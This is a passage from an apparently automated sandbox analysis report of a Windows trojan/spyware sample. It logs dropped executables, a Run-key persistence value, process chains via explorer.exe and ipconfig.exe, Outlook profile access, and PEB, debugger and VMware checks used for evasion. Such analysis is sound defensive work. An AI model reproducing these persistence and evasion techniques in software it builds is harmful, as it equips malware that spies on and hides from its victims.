          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A695F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A6AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A696D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A6A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A6A770 NtOpenThread,
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\iscan.exe A4C4BF78E737CCADBABF71B57E5676A846D9ADFC5442344EDA8267325223B964
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe A4C4BF78E737CCADBABF71B57E5676A846D9ADFC5442344EDA8267325223B964
          Source: PrWP76ejHO.exeReversingLabs: Detection: 73%
          Source: PrWP76ejHO.exeVirustotal: Detection: 32%
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeFile read: C:\Users\user\Desktop\PrWP76ejHO.exeJump to behavior
          Source: PrWP76ejHO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\PrWP76ejHO.exe C:\Users\user\Desktop\PrWP76ejHO.exe
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeProcess created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 452
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 420
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeProcess created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeFile created: C:\Users\user\AppData\Roaming\iidryiceixqaJump to behavior
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeFile created: C:\Users\user\AppData\Local\Temp\nsd4ECF.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/14@4/4
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4468
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4864
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1836:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: ipconfig.pdb source: iscan.exe, 00000003.00000002.359559716.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, iscan.exe, 00000003.00000002.359328170.0000000000767000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: iscan.exe, 00000003.00000002.359559716.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, iscan.exe, 00000003.00000002.359328170.0000000000767000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: iscan.exe, 00000001.00000003.250447257.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, iscan.exe, 00000001.00000003.251103890.0000000002A70000.00000004.00001000.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.252292538.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.360968796.0000000000B1F000.00000040.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.253843942.000000000086B000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.359594597.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.511826936.0000000002EEF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.510619896.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000003.357567203.00000000004E8000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: iscan.exe, iscan.exe, 00000003.00000003.252292538.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.360968796.0000000000B1F000.00000040.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.253843942.000000000086B000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.359594597.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.511826936.0000000002EEF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.510619896.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000003.357567203.00000000004E8000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040AC36 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041B1E9 push esp; retf
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004212DC push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0040EA97 push eax; retf
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00421329 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00421332 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00421393 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00421449 push dword ptr [2957D30Eh]; ret
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00419F22 pushad ; retf
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A7D0D1 push ecx; ret

          Persistence and Installation Behavior

          barindex
          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeFile created: C:\Users\user\AppData\Local\Temp\iscan.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeFile created: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run oipsxnjJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run oipsxnjJump to behavior
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A56A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeAPI coverage: 9.7 %
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeAPI coverage: 6.7 %
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00410310 FindFirstFileExW,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000000.268927273.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000004.00000000.333529858.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000000.268927273.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.268461375.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000004.00000000.268927273.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000004.00000000.330583659.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000004.00000000.268461375.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040A9DF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_004126DA GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A56A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040ED18 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_004113BB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0045007A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00450005 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00450019 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00450149 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
